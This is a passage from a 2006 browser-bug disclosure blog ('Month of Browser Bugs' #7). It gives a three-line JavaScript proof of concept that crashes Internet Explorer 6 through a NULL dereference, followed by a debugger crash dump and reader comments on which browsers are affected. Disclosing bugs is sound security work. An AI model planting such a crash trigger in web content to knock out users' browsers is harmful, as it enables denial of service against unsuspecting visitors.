MoBB #7: Table.Frameset
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
Demonstration
eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??
This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Frameset inside Table NULL Dereference
posted by hdm @ 7:47 PM
14 comments
links to this post
14 Comments:
hi hdm, it's ok
no crash in Opera 9 Linux
=)
Full IE6 fuckup on Win2K.
As far as I can tell, plain HTML can't trigger this, presumably because the parser doesn't create the same DOM structure. --Hixie
doesnt work on ie7
no crash on opera 8.54, winxp pro
to all the peeps with opera , firefox , etc... I clearly see it's said that this works on IE6/XP SP2 ... don't expect a 3 lines of javascript to crash all possible browsers :)
That's incorrect code anyways. You can't add a table to a frameset. What a shocker you get an error.
Interesting blog, with an interesting goal.
I hope you help raise awareness for browser security, but from what I hear, you're reposting other people's exploits, not your own. Can you confirm/deny this?
--Jon Z
Out of the seven so far, I discovered five of these. One of these five was discovered by three people all in the same period of time (#4), all using different methods of reaching the bug. The two that I did not find on my own (#7, #5) were submitted by friends of mine for the purpose of contributing to the project. Any bug I post to this blog is either my own research or submitted by a friend and used with permission.
this blog is an eye opener to all internet users that computer security should not be neglected... good job...
thanks for helping us better understand whats happening in our browser ...
NO crash on
Internet Explorer 7 Beta 3
Internet Explorer 7 Beta 2
Internet Explorer 5.5
Internet Explorer 5.01
Firefox 1.5.0.4
Firefox 1.5.0.3
Opera 9.0
Opera 8.54
Netscape 8.1
/Windows XP SP2 Fully patch
Crash on
Internet Explorer 6
http://www.sci-tech-today.com/story.xhtml?story_id=012001C8FE8C
Hey HDM... if you have a bug for opera please post that for MoBB #8 or 9. Im curious to how secure opera really is. Im curious because opera has a nice record of patch bugs according to secunia and it seems to good to be true yet i have no proof of any present unpatched bugs?
Other then that THERE IS NOT NEED TO ADD THIS TO COMMENTss!!!!!
Thank you
IE7 is not affected, IE6 crashes as it should. ;)
Post a Comment
Links to this post:
Create a Link
<< Home